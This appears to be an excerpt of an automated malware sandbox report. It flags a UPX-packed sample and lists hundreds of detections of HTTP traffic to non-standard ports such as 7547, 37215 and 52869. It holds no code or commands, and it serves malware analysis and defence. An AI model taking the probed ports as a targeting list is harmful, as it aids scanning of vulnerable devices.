Data Obfuscation

Sample is packed with UPX

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 56456 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 51632 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 33210 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 38690 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 54956 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 39274 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 53706 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 60956 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 38186 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55008 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60976 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39324 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 38208 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 38186
Source: unknown	Network traffic detected: HTTP traffic on port 50758 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48234 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39350 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 50218 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48244 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 38208
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 57106 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53096 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 46642 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55008 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 33986 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 47186 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 43406 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46670 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53124 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57134 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 47378 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34014 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 47480 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57086 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55034 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56148 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47502 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57110 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 57086
Source: unknown	Network traffic detected: HTTP traffic on port 46938 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48988 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 54044 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 33542 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 57110
Source: unknown	Network traffic detected: HTTP traffic on port 56278 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56446 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46976 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 48988
Source: unknown	Network traffic detected: HTTP traffic on port 49026 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 43740 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 54082 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34470 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 56468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49026
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44646 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 43774 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 8081 -> 34470
Source: unknown	Network traffic detected: HTTP traffic on port 43740 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56446 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 48988
Source: unknown	Network traffic detected: HTTP traffic on port 40812 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49026
Source: unknown	Network traffic detected: HTTP traffic on port 33542 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 46648 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 51754 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56446 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58442 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33542 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 48988
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49026
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55348 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 35468 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 54574 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 43406 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33526 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 47350 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44374 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55658 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41940 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 54658 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 35548 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 35468
Source: unknown	Network traffic detected: HTTP traffic on port 40930 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55498 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 38804 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 47444 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37086 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 38980 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44466 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55750 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 42038 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 35548
Source: unknown	Network traffic detected: HTTP traffic on port 38812 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 38804
Source: unknown	Network traffic detected: HTTP traffic on port 56468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56446 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 40930
Source: unknown	Network traffic detected: HTTP traffic on port 40954 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55522 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58442 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37112 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39010 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 38812
Source: unknown	Network traffic detected: HTTP traffic on port 57072 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54658 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44466 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 47522 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 40954
Source: unknown	Network traffic detected: HTTP traffic on port 46256 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37534 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49240 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57904 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 46358 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37636 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58160 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34522 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55960 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36486 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59706 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49340 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49240
Source: unknown	Network traffic detected: HTTP traffic on port 43246 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 55430 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60606 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58008 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59430 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 59822 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49340
Source: unknown	Network traffic detected: HTTP traffic on port 57378 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 52176 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60728 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58280 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 36486
Source: unknown	Network traffic detected: HTTP traffic on port 36606 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48224 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 52180 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 58912 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 57406 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36232 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 52202 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 52176
Source: unknown	Network traffic detected: HTTP traffic on port 44500 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 38118 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 36606
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 52202
Source: unknown	Network traffic detected: HTTP traffic on port 36252 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44510 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 54658 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57378 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57406 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41658 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 52148 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 55322 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 52146 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 42048 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 34726 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49340
Source: unknown	Network traffic detected: HTTP traffic on port 33542 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 50750 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58442 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47522 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34522 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55960 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 57378 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 54574 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55348 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57406 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 38118 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 48988
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49026
Source: unknown	Network traffic detected: HTTP traffic on port 55730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54658 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 54720 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57770 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 52000 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50750 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49340
Source: unknown	Network traffic detected: HTTP traffic on port 55430 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 47356 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 59710 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 47488 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 55960 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34522 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 57072 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 47522 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 60170 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 35190 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 38490 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56446 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55726 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 35300 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49610 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 51676 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 38602 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42502 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57378 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 51684 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55846 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49618 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49610
Source: unknown	Network traffic detected: HTTP traffic on port 42598 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57396 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 52028 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49618
Source: unknown	Network traffic detected: HTTP traffic on port 38118 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57406 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57406 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 52000 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60282 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58336 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 43406 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 60652 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58384 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48648 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60700 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36200 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49360 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 43090 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49610
Source: unknown	Network traffic detected: HTTP traffic on port 50326 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48684 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49378 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 35878 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43108 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49618
Source: unknown	Network traffic detected: HTTP traffic on port 50348 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48704 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36256 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48454 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48706 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58442 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50750 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58064 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45592 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48486 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57396 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58096 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45624 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 45592
Source: unknown	Network traffic detected: HTTP traffic on port 57406 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 45624
Source: unknown	Network traffic detected: HTTP traffic on port 43848 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58952 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 51820 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 32848 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37732 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36176 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58978 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48750 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 34516 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 37756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 32884 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36218 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49340
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49610
Source: unknown	Network traffic detected: HTTP traffic on port 57396 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37732 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34522 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33542 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49198 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49618
Source: unknown	Network traffic detected: HTTP traffic on port 37756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54658 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55960 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49202 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57406 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48230 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 47522 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 60282 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55348 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 54574 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 42178 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 34508 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 43976 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34728 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 37732 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48750 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 34516 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 33582 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38118 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57378 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57406 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55430 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57072 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50750 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34020 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 46534 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 35934 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 48988
Source: unknown	Network traffic detected: HTTP traffic on port 34092 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57396 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58974 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 56030 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 35962 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 46608 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49026
Source: unknown	Network traffic detected: HTTP traffic on port 51518 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 35990 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41730 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37732 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58974 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 48996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55322 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41754 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 41730
Source: unknown	Network traffic detected: HTTP traffic on port 37396 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 37756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55338 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 41754
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37412 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 44058 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49610
Source: unknown	Network traffic detected: HTTP traffic on port 55736 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 33472 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 35132 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 46420 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40234 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55830 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 33566 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49618
Source: unknown	Network traffic detected: HTTP traffic on port 44070 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 51488 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 35226 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 35132
Source: unknown	Network traffic detected: HTTP traffic on port 41226 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41708 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 39440 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 46450 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 35226
Source: unknown	Network traffic detected: HTTP traffic on port 40264 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39842 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 60496 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 52644 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 60968 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 55688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57406 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39992 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 56122 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 51608 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 51488
Source: unknown	Network traffic detected: HTTP traffic on port 41356 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56030 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 51608
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45472 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49012
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 48996
Source: unknown	Network traffic detected: HTTP traffic on port 45482 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36680 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 34302 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37462 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47554 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56122 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56446 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41226 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58442 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47554 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56030 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41356 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56456 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50844 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 36872 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 50844 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 47554 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56456 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32910 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56122 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34522 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56510 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47268 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 54862 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 42214 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 51442 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 37892 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49340
Source: unknown	Network traffic detected: HTTP traffic on port 55960 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37732 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41226 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48504 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 50844 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 32910 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44414 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 32918 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34302 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 36680 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41356 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44516 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34796 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36538 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56186 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 34186 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39878 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60734 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 35900 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 38278 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34818 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58590 -> 1723
Source: unknown	Network traffic detected: HTTP traffic on port 36566 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34796 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 47522 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54658 -> 7547
